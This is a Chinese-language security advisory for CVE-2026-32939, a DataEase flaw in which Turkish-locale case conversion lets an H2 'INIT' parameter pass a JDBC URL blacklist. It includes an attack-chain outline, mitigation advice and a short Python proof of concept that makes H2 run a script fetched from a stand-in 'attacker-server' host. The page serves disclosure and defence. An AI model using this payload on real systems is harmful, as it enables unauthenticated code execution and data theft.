CVE-2026-32939 CVSS 8.1 高危

CVE-2026-32939 DataEase Locale处理漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32939

漏洞类型

参数注入

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DataEase

漏洞概述

DataEase开源数据可视化分析工具在JDBC URL验证逻辑中存在Locale处理不一致漏洞。攻击者可在土耳其语环境下，利用Java特定Locale的大小写转换规则差异，巧妙绕过安全黑名单检查，将恶意参数注入至H2 JDBC引擎，进而执行未授权的危险操作，造成严重的数据泄露或服务被控风险。

技术细节

该漏洞源于DataEase与H2 JDBC引擎在处理URL大小写转换时的Locale不一致性。DataEase默认使用JVM运行时Locale（如土耳其语tr_TR），而H2引擎强制使用Locale.ENGLISH。在土耳其语环境中，Java将小写'i'转为'İ'（带点大写I）。攻击者可构造如`iNIT=RUNSCRIPT...`的恶意载荷。DataEase校验层将其转为`İNIT`，因不匹配黑名单`INIT`而放行。但H2引擎收到原始数据后，按英语规则将其解析为`INIT`，成功执行初始化脚本。这种差异使得攻击者能够绕过安全过滤，向数据库引擎走私危险参数，可能导致数据泄露或远程代码执行。

攻击链分析

STEP 1

信息收集

识别运行在土耳其语Locale环境下的DataEase目标实例。

STEP 2

构造载荷

利用土耳其语Locale特性，构造包含'iNIT'关键字的恶意JDBC URL参数。

STEP 3

绕过验证

DataEase的验证逻辑将'iNIT'转换为'İNIT'，未匹配黑名单'INIT'，从而放行请求。

STEP 4

执行攻击

H2 JDBC引擎使用英语Locale将参数解析为'INIT'，执行初始化脚本或恶意SQL命令。

STEP 5

达成目标

攻击者成功在数据库侧执行任意代码或窃取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-32939: DataEase Locale Handling Bypass
# This script demonstrates bypassing the blacklist check using Turkish Locale behavior.
# The lowercase 'i' becomes 'İ' in Turkish, bypassing the 'INIT' check in DataEase,
# but H2 engine interprets it as 'INIT'.

import requests

target_url = "http://target-dataease-instance/api/datasource/validate"

# Malicious JDBC URL payload
# Note: 'iNIT' bypasses the DataEase filter (tr_TR -> İNIT != INIT)
# H2 Engine (en_US -> iNIT -> INIT) executes it.
payload = {
    "jdbcUrl": "jdbc:h2:mem:testdb;iNIT=RUNSCRIPT FROM 'http://attacker-server/exploit.sql'",
    "host": "localhost",
    "port": "8080",
    "dbName": "testdb"
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check if the script was executed by H2.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

DataEase <= 2.10.19

防御指南

临时缓解措施

建议立即升级至DataEase 2.10.20或更高版本。在无法立即升级的情况下，应临时将服务器JVM的默认Locale设置为英语（如en_US），并严格限制对数据源验证接口的外部访问，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表